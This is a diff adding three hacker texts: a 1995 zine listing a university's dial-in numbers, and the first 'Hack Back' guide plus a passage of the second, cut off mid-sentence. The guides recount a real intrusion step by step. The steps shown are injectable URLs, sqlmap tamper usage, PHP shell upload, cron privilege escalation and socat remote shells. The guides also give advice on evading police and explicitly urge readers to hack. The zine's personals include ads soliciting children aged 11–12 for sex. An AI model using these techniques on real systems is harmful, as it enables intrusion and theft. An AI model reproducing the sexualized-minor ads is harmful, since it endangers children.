b/L0CK/l0ck4.txt @@ -0,0 +1,261 @@ + + + + + \ _ _ / ARG! ARG! ARG! ARG! ARG! ARG! \ _ _ / + \((___))/ \((___))/ + [ o x ] L0CK communications [ o x ] + |(_)| ...presents... |(_)| + ( o ) ( o ) + / (_) \ the GNU October 1995 release. / (_) \ + / Let's Pretend I'm the adult and you're the little \ + boy.. So Grab Ur 3-D Glasses! L0CK is BACK! + + + + ...................................................................... + + + + + + + Table_Of_Contents + ~~~~~~~~~~~~~~~~~ + + hacking college computers..................sarlo + letters to L0CK............................blewt + L0CK personals.............................max-q + the warrior's prayer.......................blewt + + + + + + + ...................................................................... + + + + + ***THE FOLLOWING IS FOR INFORMATIONAL PURPOSES ONLY*** + ***I ACCEPT NO RESPONSABILITY FOR ANYTHING YOU DO*** + ***WHICH GETS YOU ARRESTED OR SOMETHING*** + + &%&%&%&%&%&%&%& Fun with Temple's Computers &%&%&%&%&%&%&%&% + +Shut up what's the number!? + +Gee your impatient... +2400 - (215)204-9630 +9600 - (215)204-9638 +14400 - (215)204-2800 + +So what the hell do I get? + +The following is a log of my activites... +Pardon my stuoidyt I'm not familiar with the system... +It is short but to me it looks like you could have a LOTTA fun ! + +CONNECT 14400/ARQ +C + + +Welcome to TempleNet - Temple University's Ethernet network + +Enter a Command followed by [Return] or [Enter]. + + Command: Description: + telnet astro Astro Unix system + tn3270 ibm IBM mainframe + telnet library Temple's library catalog + +For HELP, call the Network HOTLINE at 204-6529. + +**Dialin for up to 2400 bps: 204-9630 thru 9634 (40 ports to WiseOwl) +**Dialin for up to 9600 bps: 204-9638 (7 ports to WiseOwl) +**Dialin for up to 14400 bps: 204-2800 (64 ports to TempleNet) + +This system is restricted to authorized Temple University users and is +subject to audit. The unauthorized access, use, or modification of any +network component is a criminal violation of federal and state laws. (4) + + + + +TempleNet>telnet ibm +Trying IBM (155.247.14.2)... Open + . + +.exit + +HCPCFC015E Command not valid before LOGON: EXIT + +Enter one of the following commands: + + LOGON userid (Example: LOGON VMUSER1) + LOGOFF +.logon vmuser1 + +HCPLGA053E VMUSER1 not in CP directory + +Enter one of the following commands: + + LOGON userid (Example: LOGON VMUSER1) + LOGOFF +.logoff + +LOGOFF AT 22:27:26 EDT FRIDAY 06/09/95 + +[Connection to IBM closed by foreign host] +TempleNet> + +TempleNet>? + +connect Connect to host - same as typing just a host name +disconnect Break the connection specified by name or number +exit, quit, logout Exit from the EXEC +lat Connect to service using DEC LAT protocol +lock Lock the terminal +name-connection Give a connection a logical name +resume Make the named connection be current +rlogin Connect to host using rlogin protocol +show Information commands, type "show ?" for list +slip Enter SLIP mode +systat Show terminal lines and users +telnet Connect to host using telnet protocol +tn3270 Connect to host using telnet protocol (3270) +terminal Change terminal's parameters, type "terminal ?" +where Show open connections +xremote Enter XRemote mode + To resume connection + +TempleNet> + +TempleNet>telnet astro +Trying ASTRO (155.247.165.100)... Open + + +EP/IX (astro) + +login: user1 +Password: +UX:login: ERROR: Login incorrect + +NO CARRIER + +Now remember ... :-) +This system is restricted to authorized Temple University users and is +subject to audit. The unauthorized access, use, or modification of any +network component is a criminal violation of federal and state laws. (4) + +Have fun with it!(Oh by the way I dialed the number by "accident" Hehehe) + +-Sarlo 10/13/95 [L0CK] + + +------------------------------------------------------------------------------ + LETTERS TO [L0CK] +Dear [L0CK], + I have been dating my boyfreind for almost 2 years and i thought i really + loved him. But a few months ago i met another guy who is absolutely + adoreable and lots of fun to be with. I feel guilty and miserable when + I'm with this other man. What sould I do, [L0CK]? + - Torn Between Two Lovers + +Dear Torn, + Ah the classic love triangle. The situation is really not fair to anyone, + but the longer you stay in it the stickier it will get.[teehee] Get your + long-term relationship out in the open. Whatever you decide to do, do it + fast and gently! + - blewt [L0CK] +****************************************************************************** +ATTENTION: WE DECIDED TO ADD A NEW SECTION TO THE [L0CK] GNUZLETTER: THIS IS +IN LARGE PART DUE TO LOTS OF MEN WRITTING ME AND ASKING ME TO PRINT THEIR +PERSONALS. I HAD MY DOUBTS ABOUT IT, BUT SINCE MANY MEN HAVE NOT FOUND TRUE +LOVE LIKE I HAVE WITH MY BROTHERS, I FELT PITY FOR THEM. JUST LIKE BATMAN +AND ROBIN, WALLY AND THE BEAVER, SKIPPER AND GILLIGAN, MINOR THREAT AND +MUCHO MAAS THEY CAN FIND TRUE BROTHERLY HAPPINESS. - MAX-Q +***************************************************************************** + | + COCK-A-DOODLE-DOO | JOIN IN OUR PAGAN MEETINGS + | + Pre-Op Transexual Marine looking | A Bi-Weekly Discussion of Life + for boys who like red bottoms and | and Homosexuality. Call and be + propper punishment. | involved. 703-360-8427 + | +--------------------------------------+--------------------------------------- + | + ARE YOU AFRAID OF THE DARK | ORAL ATHLETIC AND FLEXIBLE + | + Confused About Relationships and | Seeking Discreet Dominant Male + tired of being hassled by nosey | for sensual stimulation and some + Investigators from the Child Welfare | Phantastic times. You Know what + Agencey? We Can Help. Discreet. | You want! Come and Get it! + | +--------------------------------------+--------------------------------------- + | + YOU KNOW THE CONSEQUENCES | YOUR SPECIAL AD + | + Help Me Seize Young Offenders and | COULD BE RIGHT HERE #@! + their Equipment. I'll Show You an | + Interjudicial Proceeding that will | SEND ELECTRONIC MAIL TO: + Change Your Lifestyle! | MAX-Q@2600.COM + | +--------------------------------------+--------------------------------------- + | + ARE YOU 11 OR 12 ??? | Str41Gh+ Act1nG M4l3 (El1t3) + | + Looking for men 11 - 12 for adult | L00k1ng F0r MasCul1n3 Sh0rt GuY + video satisfaction. I am 35 into | f0R s4fe T1m3s. I w4n+ t0 B3 + Professional wrestling. | Tr34t3d Juzt L1k3 a L1tTle g1rL. + Let's talk soon : 505-984-8800 | d0 m3 n0w!! : 516-T0o-kRAd + | +--------------------------------------+--------------------------------------- + | + LET'S BE FREE | MUCH OLDER GENTLEMAN + | + Gay White Male 38, 5'11" looking | Looking For Asian Boy 12 - 18 + for men, 12 - 32 clean, fit, and | who is petite. Someone to go + hairy. Discreet Encounters. | out with. Very Discreet. + Call Anytime : 516-751-2600 | Call Tonight! 011-61-2-368-0041 + | +--------------------------------------+--------------------------------------- + +"The Warrior's Prayer," by blewt [L0CK] + +To my ancestors, whom I shall leave anonymous, and my man, max-q: + +I leave this day for battle. +I know not whom I fight. +The victory is not certain. +For our enemies are strong. + +I carry myself with courage. +Though I quake with fear. +I fight them all with honor. +For I have my brothers near. + +Oh ye I pray to thee, +Those who came before, +For the strength of heart I need... +Just to lift this keyboard. + +I know I seem the coward, +Standing on the snow. +I no longer wear my armor. +I have lost my will to love. + +What can I do with this life, +O ye in the beyond? +How can I look the others in the face, +Now that my will to love is gone? + +So to thee I say my final goodbye, +And a hardy forget-me-not. +For I'll always have my brothers, +And together we are [L0CK]. + + - blewt - 1995 + + diff --git a/PhineasFisher/1.txt b/PhineasFisher/1.txt new file mode 100755 index 0000000..a357861 --- /dev/null +++ b/PhineasFisher/1.txt @@ -0,0 +1,407 @@ + _ _ _ ____ _ _ + | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | + | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | + | _ | (_| | (__| < | |_) | (_| | (__| <|_| + |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) + + A DIY Guide for those without the patience to wait for whistleblowers + + +--[ 1 ]-- Introduction + +I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz +it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple +it is, and to hopefully inform and inspire you to go out and hack shit. If you +have no experience with programming or hacking, some of the text below might +look like a foreign language. Check the resources section at the end to help you +get started. And trust me, once you've learned the basics you'll realize this +really is easier than filing a FOIA request. + + +--[ 2 ]-- Staying Safe + +This is illegal, so you'll need to take same basic precautions: + +1) Make a hidden encrypted volume with Truecrypt 7.1a [0] +2) Inside the encrypted volume install Whonix [1] +3) (Optional) While just having everything go over Tor thanks to Whonix is + probably sufficient, it's better to not use an internet connection connected + to your name or address. A cantenna, aircrack, and reaver can come in handy + here. + +[0] https://truecrypt.ch/downloads/ +[1] https://www.whonix.org/wiki/Download#Install_Whonix + +As long as you follow common sense like never do anything hacking related +outside of Whonix, never do any of your normal computer usage inside Whonix, +never mention any information about your real life when talking with other +hackers, and never brag about your illegal hacking exploits to friends in real +life, then you can pretty much do whatever you want with no fear of being v&. + +NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable +for some things like web browsing, when it comes to using hacking tools like +nmap, sqlmap, and nikto that are making thousands of requests, they will run +very slowly over Tor. Not to mention that you'll want a public IP address to +receive connect back shells. I recommend using servers you've hacked or a VPS +paid with bitcoin to hack from. That way only the low bandwidth text interface +between you and the server is over Tor. All the commands you're running will +have a nice fast connection to your target. + + +--[ 3 ]-- Mapping out the target + +Basically I just repeatedly use fierce [0], whois lookups on IP addresses and +domain names, and reverse whois lookups to find all IP address space and domain +names associated with an organization. + +[0] http://ha.ckers.org/fierce/ + +For an example let's take Blackwater. We start out knowing their homepage is at +academi.com. Running fierce.pl -dns academi.com we find the subdomains: +67.238.84.228 email.academi.com +67.238.84.242 extranet.academi.com +67.238.84.240 mail.academi.com +67.238.84.230 secure.academi.com +67.238.84.227 vault.academi.com +54.243.51.249 www.academi.com + +Now we do whois lookups and find the homepage of www.academi.com is hosted on +Amazon Web Service, while the other IPs are in the range: +NetRange: 67.238.84.224 - 67.238.84.255 +CIDR: 67.238.84.224/27 +CustName: Blackwater USA +Address: 850 Puddin Ridge Rd + +Doing a whois lookup on academi.com reveals it's also registered to the same +address, so we'll use that as a string to search with for the reverse whois +lookups. As far as I know all the actual reverse whois lookup services cost +money, so I just cheat with google: +"850 Puddin Ridge Rd" inurl:ip-address-lookup +"850 Puddin Ridge Rd" inurl:domaintools + +Now run fierce.pl -range on the IP ranges you find to lookup dns names, and +fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more +whois lookups and repeat the process until you've found everything. + +Also just google the organization and browse around its websites. For example on +academi.com we find links to a careers portal, an online store, and an employee +resources page, so now we have some more: +54.236.143.203 careers.academi.com +67.132.195.12 academiproshop.com +67.238.84.236 te.academi.com +67.238.84.238 property.academi.com +67.238.84.241 teams.academi.com + +If you repeat the whois lookups and such you'll find academiproshop.com seems to +not be hosted or maintained by Blackwater, so scratch that off the list of +interesting IPs/domains. + +In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com +was simply a whois lookup of finfisher.com which found it registered to the name +"FinFisher GmbH". Googling for: +"FinFisher GmbH" inurl:domaintools +finds gamma-international.de, which redirects to finsupport.finfisher.com + +...so now you've got some idea how I map out a target. +This is actually one of the most important parts, as the larger the attack +surface that you are able to map out, the easier it will be to find a hole +somewhere in it. + + +--[ 4 ]-- Scanning & Exploiting + +Scan all the IP ranges you found with nmap to find all services running. Aside +from a standard port scan, scanning for SNMP is underrated. + +Now for each service you find running: + +1) Is it exposing something it shouldn't? Sometimes companies will have services +running that require no authentication and just assume it's safe because the url +or IP to access it isn't public. Maybe fierce found a git subdomain and you can +go to git.companyname.come/gitweb/ and browse their source code. + +2) Is it horribly misconfigured? Maybe they have an ftp server that allows +anonymous read or write access to an important directory. Maybe they have a +database server with a blank admin password (lol stratfor). Maybe their embedded +devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's +default password. + +3) Is it running an old version of software vulnerable to a public exploit? + + +Webservers deserve their own category. For any webservers, including ones nmap +will often find running on nonstandard ports, I usually: + +1) Browse them. Especially on subdomains that fierce finds which aren't intended +for public viewing like test.company.com or dev.company.com you'll often find +interesting stuff just by looking at them. + +2) Run nikto [0]. This will check for things like webserver/.svn/, +webserver/backup/, webserver/phpinfo.php, and a few thousand other common +mistakes and misconfigurations. + +3) Identify what software is being used on the website. WhatWeb is useful [1] + +4) Depending on what software the website is running, use more specific tools +like wpscan [2], CMS-Explorer [3], and Joomscan [4]. + +First try that against all services to see if any have a misconfiguration, +publicly known vulnerability, or other easy way in. If not, it's time to move +on to finding a new vulnerability: + +5) Custom coded web apps are more fertile ground for bugs than large widely used +projects, so try those first. I use ZAP [5], and some combination of its +automated tests along with manually poking around with the help of its +intercepting proxy. + +6) For the non-custom software they're running, get a copy to look at. If it's +free software you can just download it. If it's proprietary you can usually +pirate it. If it's proprietary and obscure enough that you can't pirate it you +can buy it (lame) or find other sites running the same software using google, +find one that's easier to hack, and get a copy from them. + +[0] http://www.cirt.net/nikto2 +[1] http://www.morningstarsecurity.com/research/whatweb +[2] http://wpscan.org/ +[3] https://code.google.com/p/cms-explorer/ +[4] http://sourceforge.net/projects/joomscan/ +[5] https://code.google.com/p/zaproxy/ + + +For finsupport.finfisher.com the process was: + +* Start nikto running in the background. + +* Visit the website. See nothing but a login page. Quickly check for sqli in the + login form. + +* See if WhatWeb knows anything about what software the site is running. + +* WhatWeb doesn't recognize it, so the next question I want answered is if this + is a custom website by Gamma, or if there are other websites using the same + software. + +* I view the page source to find a URL I can search on (index.php isn't + exactly unique to this software). I pick Scripts/scripts.js.php, and google: + allinurl:"Scripts/scripts.js.php" + +* I find there's a handful of other sites using the same software, all coded by + the same small webdesign firm. It looks like each site is custom coded but + they share a lot of code. So I hack a couple of them to get a collection of + code written by the webdesign firm. + +At this point I can see the news stories that journalists will write to drum +up views: "In a sophisticated, multi-step attack, hackers first compromised a +web design firm in order to acquire confidential data that would aid them in +attacking Gamma Group..." + +But it's really quite easy, done almost on autopilot once you get the hang of +it. It took all of a couple minutes to: + +* google allinurl:"Scripts/scripts.js.php" and find the other sites + +* Notice they're all sql injectable in the first url parameter I try. + +* Realize they're running Apache ModSecurity so I need to use sqlmap [0] with + the option --tamper='tamper/modsecurityversioned.py' + +* Acquire the admin login information, login and upload a php shell [1] (the + check for allowable file extensions was done client side in javascript), and + download the website's source code. + +[0] http://sqlmap.org/ +[1] https://epinna.github.io/Weevely/ + +Looking through the source code they might as well have named it Damn Vulnerable +Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in +javascript, and if you're unauthenticated the admin page just sends you back to +the login page with a Location header, but you can have your intercepting proxy +filter the Location header out and access it just fine. + +[0] http://www.dvwa.co.uk/ + +Heading back over to the finsupport site, the admin /BackOffice/ page returns +403 Forbidden, and I'm having some issues with the LFI, so I switch to using the +sqli (it's nice to have a dozen options to choose from). The other sites by the +web designer all had an injectable print.php, so some quick requests to: +https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 +https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 +reveal that finsupport also has print.php and it is injectable. And it's +database admin! For MySQL this means you can read and write files. It turns out +the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. +But I can use a short script that uses sqlmap --file-read to get the php source +for a URL, and a normal web request to get the HTML, and then finds files +included or required in the php source, and finds php files linked in the HTML, +to recursively download the source to the whole site. + +Looking through the source, I see customers can attach a file to their support +tickets, and there's no check on the file extension. So I pick a username and +password out of the customer database, create a support request with a php shell +attached, and I'm in! + + +--[ 5 ]-- (fail at) Escalating + + ___________ +< got r00t? > + ----------- + \ ^__^ + \ (oo)\_______ + (__)\ )\/\ + ||----w | + || || + ^^^^^^^^^^^^^^^^ + +Root over 50% of linux servers you encounter in the wild with two easy scripts, +Linux_Exploit_Suggester [0], and unix-privesc-check [1]. + +[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester +[1] https://code.google.com/p/unix-privesc-check/ + +finsupport was running the latest version of Debian with no local root exploits, +but unix-privesc-check returned: +WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user +www-data can write to /etc/cron.hourly/mgmtlicensestatus +WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data +can write to /etc/cron.hourly/webalizer + +so I add to /etc/cron.hourly/webalizer: +chown root:root /path/to/my_setuid_shell +chmod 04755 /path/to/my_setuid_shell + +wait an hour, and ....nothing. Turns out that while the cron process is running +it doesn't seem to be actually running cron jobs. Looking in the webalizer +directory shows it didn't update stats the previous month. Apparently after +updating the timezone cron will sometimes run at the wrong time or sometimes not +run at all and you need to restart cron after changing the timezone. ls -l +/etc/localtime shows the timezone got updated June 6, the same time webalizer +stopped recording stats, so that's probably the issue. At any rate, the only +thing this server does is host the website, so I already have access to +everything interesting on it. Root wouldn't get much of anything new, so I move +on to the rest of the network. + + +--[ 6 ]-- Pivoting + +The next step is to look around the local network of the box you hacked. This +is pretty much the same as the first Scanning & Exploiting step, except that +from behind the firewall many more interesting services will be exposed. A +tarball containing a statically linked copy of nmap and all its scripts that you +can upload and run on any box is very useful for this. The various nfs-* and +especially smb-* scripts nmap has will be extremely useful. + +The only interesting thing I could get on finsupport's local network was another +webserver serving up a folder called 'qateam' containing their mobile malware. + + +--[ 7 ]-- Have Fun + +Once you're in their networks, the real fun starts. Just use your imagination. +While I titled this a guide for wannabe whistleblowers, there's no reason to +limit yourself to leaking documents. My original plan was to: +1) Hack Gamma and obtain a copy of the FinSpy server software +2) Find vulnerabilities in FinSpy server. +3) Scan the internet for, and hack, all FinSpy C&C servers. +4) Identify the groups running them. +5) Use the C&C server to upload and run a program on all targets telling them + who was spying on them. +6) Use the C&C server to uninstall FinFisher on all targets. +7) Join the former C&C servers into a botnet to DDoS Gamma Group. + +It was only after failing to fully hack Gamma and ending up with some +interesting documents but no copy of the FinSpy server software that I had to +make due with the far less lulzy backup plan of leaking their stuff while +mocking them on twitter. +Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password +already so I can move on to step 2! + + +--[ 8 ]-- Other Methods + +The general method I outlined above of scan, find vulnerabilities, and exploit +is just one way to hack, probably better suited to those with a background in +programming. There's no one right way, and any method that works is as good as +any other. The other main ways that I'll state without going into detail are: + +1) Exploits in web browers, java, flash, or microsoft office, combined with +emailing employees with a convincing message to get them to open the link or +attachment, or hacking a web site frequented by the employees and adding the +browser/java/flash exploit to that. +This is the method used by most of the government hacking groups, but you don't +need to be a government with millions to spend on 0day research or subscriptions +to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit +for a couple thousand, and rent access to one for much less. There's also +metasploit browser autopwn, but you'll probably have better luck with no +exploits and a fake flash updater prompt. + +2) Taking advantage of the fact that people are nice, trusting, and helpful 95% +of the time. +The infosec industry invented a term to make this sound like some sort of +science: "Social Engineering". This is probably the way to go if you don't know +too much about computers, and it really is all it takes to be a successful +hacker [0]. + +[0] https://www.youtube.com/watch?v=DB6ywr9fngU + + +--[ 9 ]-- Resources + +Links: + +* https://www.pentesterlab.com/exercises/ +* http://overthewire.org/wargames/ +* http://www.hackthissite.org/ +* http://smashthestack.org/ +* http://www.win.tue.nl/~aeb/linux/hh/hh.html +* http://www.phrack.com/ +* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot +* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash +* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ +* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers + (all his other blog posts are great too) +* https://www.corelan.be/ (start at Exploit writing tutorial part 1) +* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ + One trick it leaves out is that on most systems the apache access log is + readable only by root, but you can still include from /proc/self/fd/10 or + whatever fd apache opened it as. It would also be more useful if it mentioned + what versions of php the various tricks were fixed in. +* http://www.dest-unreach.org/socat/ + Get usable reverse shells with a statically linked copy of socat to drop on + your target and: + target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM + host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM + It's also useful for setting up weird pivots and all kinds of other stuff. + +Books: + +* The Web Application Hacker's Handbook +* Hacking: The Art of Exploitation +* The Database Hacker's Handbook +* The Art of Software Security Assessment +* A Bug Hunter's Diary +* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier +* TCP/IP Illustrated + +Aside from the hacking specific stuff almost anything useful to a system +administrator for setting up and administering networks will also be useful for +exploring them. This includes familiarity with the windows command prompt and unix +shell, basic scripting skills, knowledge of ldap, kerberos, active directory, +networking, etc. + + +--[ 10 ]-- Outro + +You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a +tool. It's not selling hacking tools that makes Gamma evil. It's who their +customers are targeting and with what purpose that makes them evil. That's not +to say that tools are inherently neutral. Hacking is an offensive tool. In the +same way that guerrilla warfare makes it harder to occupy a country, whenever +it's cheaper to attack than to defend it's harder to maintain illegitimate +authority and inequality. So I wrote this to try to make hacking easier and more +accessible. And I wanted to show that the Gamma Group hack really was nothing +fancy, just standard sqli, and that you do have the ability to go out and take +similar action. + +Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea +Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned +hackers, dissidents, and criminals! \ No newline at end of file diff --git a/PhineasFisher/2.txt b/PhineasFisher/2.txt new file mode 100755 index 0000000..6918a58 --- /dev/null +++ b/PhineasFisher/2.txt @@ -0,0 +1,925 @@ + _ _ _ ____ _ _ + | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | + | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | + | _ | (_| | (__| < | |_) | (_| | (__| <|_| + |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) + + A DIY Guide + + + + ,-._,-._ + _,-\ o O_/; + / , ` `| + | \-.,___, / ` + \ `-.__/ / ,.\ + / `-.__.-\` ./ \' + / /| ___\ ,/ `\ + ( ( |.-"` '/\ \ ` + \ \/ ,, | \ _ + \| o/o / \. + \ , / / + ( __`;-;'__`) \\ + `//'` `||` `\ + _// || __ _ _ _____ __ + .-"-._,(__) .(__).-""-. | | | | |_ _| | + / \ / \ | | |_| | | | | + \ / \ / | | _ | | | | + `'-------` `--------'` __| |_| |_| |_| |__ + #antisec + + + +--[ 1 - Introduction ]---------------------------------------------------------- + +You'll notice the change in language since the last edition [1]. The +English-speaking world already has tons of books, talks, guides, and +info about hacking. In that world, there's plenty of hackers better than me, +but they misuse their talents working for "defense" contractors, for intelligence +agencies, to protect banks and corporations, and to defend the status quo. +Hacker culture was born in the US as a counterculture, but that origin only +remains in its aesthetics - the rest has been assimilated. At least they can +wear a t-shirt, dye their hair blue, use their hacker names, and feel like +rebels while they work for the Man. + +You used to have to sneak into offices to leak documents [2]. You used to need +a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4]. +Like the CNT said after the Gamma Group hack: "Let's take a step forward with +new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight! + +[1] http://pastebin.com/raw.php?i=cRYvK4jb +[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI +[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html +[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf +[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group + + +--[ 2 - Hacking Team ]---------------------------------------------------------- + +Hacking Team was a company that helped governments hack and spy on +journalists, activists, political opposition, and other threats to their power +[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals +and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the +fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende +RCS". They also claimed to have technology to solve the "problem" posed by Tor +and the darknet [13]. But seeing as I'm still free, I have my doubts about +its effectiveness. + +[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/ +[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html +[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/ +[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/ +[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/ +[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/ +[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/ +[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal +[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/ +[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/ +[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/ +[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html +[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web + + +--[ 3 - Stay safe out there ]--------------------------------------------------- + +Unfortunately, our world is backwards. You get rich by doing bad things and go +to jail for doing good. Fortunately, thanks to the hard work of people like +the Tor project [1], you can avoid going to jail by taking a few simple +precautions: + +1) Encrypt your hard disk [2] + + I guess when the police arrive to seize your computer, it means you've + already made a lot of mistakes, but it's better to be safe. + +2) Use a virtual machine with all traffic routed through Tor + + This accomplishes two things. First, all your traffic is anonymized through + Tor. Second, keeping your personal life and your hacking on separate + computers helps you not to mix them by accident. + + You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or + something custom [6]. Here's [7] a detailed comparison. + +3) (Optional) Don't connect directly to Tor + + Tor isn't a panacea. They can correlate the times you're connected to Tor + with the times your hacker handle is active. Also, there have been + successful attacks against Tor [8]. You can connect to Tor using other + peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for + cracking wifi. Another option is to connect to a VPN or a bridge node [10] + before Tor, but that's less secure because they can still correlate the + hacker's activity with your house's internet activity (this was used as + evidence against Jeremy Hammond [11]). + + The reality is that while Tor isn't perfect, it works quite well. When I + was young and reckless, I did plenty of stuff without any protection (I'm + referring to hacking) apart from Tor, that the police tried their hardest + to investigate, and I've never had any problems. + +[1] https://www.torproject.org/ +[2] https://info.securityinabox.org/es/chapter-4 +[3] https://www.whonix.org/ +[4] https://tails.boum.org/ +[5] https://www.qubes-os.org/doc/privacy/torvm/ +[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy +[7] https://www.whonix.org/wiki/Comparison_with_Others +[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/ +[9] http://www.wifislax.com/ +[10] https://www.torproject.org/docs/bridges.html.en +[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html + + +----[ 3.1 - Infrastructure ]---------------------------------------------------- + +I don't hack directly from Tor exit nodes. They're on blacklists, they're +slow, and they can't receive connect-backs. Tor protects my anonymity while I +connect to the infrastructure I use to hack, which consists of: + +1) Domain Names + + For C&C addresses, and for DNS tunnels for guaranteed egress. + +2) Stable Servers + + For use as C&C servers, to receive connect-back shells, to launch attacks, + and to store the loot. + +3) Hacked Servers + + For use as pivots to hide the IP addresses of the stable servers. And for + when I want a fast connection without pivoting, for example to scan ports, + scan the whole internet, download a database with sqli, etc. + +Obviously, you have to use an anonymous payment method, like bitcoin (if it's +used carefully). + + +----[ 3.2 - Attribution ]------------------------------------------------------- + +In the news we often see attacks traced back to government-backed hacking +groups ("APTs"), because they repeatedly use the same tools, leave the same +footprints, and even use the same infrastructure (domains, emails, etc). +They're negligent because they can hack without legal consequences. + +I didn't want to make the police's work any easier by relating my hack of +Hacking Team with other hacks I've done or with names I use in my day-to-day +work as a blackhat hacker. So, I used new servers and domain names, registered +with new emails, and payed for with new bitcoin addresses. Also, I only used +tools that are publicly available, or things that I wrote specifically for +this attack, and I changed my way of doing some things to not leave my usual +forensic footprint. + + +--[ 4 - Information Gathering ]------------------------------------------------- + +Although it can be tedious, this stage is very important, since the larger the +attack surface, the easier it is to find a hole somewhere in it. + + +----[ 4.1 - Technical Information ]--------------------------------------------- + +Some tools and techniques are: + +1) Google + + A lot of interesting things can be found with a few well-chosen search + queries. For example, the identity of DPR [1]. The bible of Google hacking + is the book "Google Hacking for Penetration Testers". You can find a short + summary in Spanish at [2]. + +2) Subdomain Enumeration + + Often, a company's main website is hosted by a third party, and you'll find + the company's actual IP range thanks to subdomains like mx.company.com or + ns1.company.com. Also, sometimes there are things that shouldn't be exposed + in "hidden" subdomains. Useful tools for discovering domains and subdomains + are fierce [3], theHarvester [4], and recon-ng [5]. + +3) Whois lookups and reverse lookups + + With a reverse lookup using the whois information from a domain or IP range + of a company, you can find other domains and IP ranges. As far as I know, + there's no free way to do reverse lookups aside from a google "hack": + + "via della moscova 13" site:www.findip-address.com + "via della moscova 13" site:domaintools.com + +4) Port scanning and fingerprinting + + Unlike the other techniques, this talks to the company's servers. I + include it in this section because it's not an attack, it's just + information gathering. The company's IDS might generate an alert, but you + don't have to worry since the whole internet is being scanned constantly. + + For scanning, nmap [6] is precise, and can fingerprint the majority of + services discovered. For companies with very large IP ranges, zmap [7] or + masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web + sites. + +[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html +[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf +[3] http://ha.ckers.org/fierce/ +[4] https://github.com/laramies/theHarvester +[5] https://bitbucket.org/LaNMaSteR53/recon-ng +[6] https://nmap.org/ +[7] https://zmap.io/ +[8] https://github.com/robertdavidgraham/masscan +[9] http://www.morningstarsecurity.com/research/whatweb +[10] http://blindelephant.sourceforge.net/ + + +----[ 4.2 - Social Information ]------------------------------------------------ + +For social engineering, it's useful to have information about the employees, +their roles, contact information, operating system, browser, plugins, +software, etc. Some resources are: + +1) Google + + Here as well, it's the most useful tool. + +2) theHarvester and recon-ng + + I already mentioned them in the previous section, but they have a lot more + functionality. They can find a lot of information quickly and + automatically. It's worth reading all their documentation. + +3) LinkedIn + + A lot of information about the employees can be found here. The company's + recruiters are the 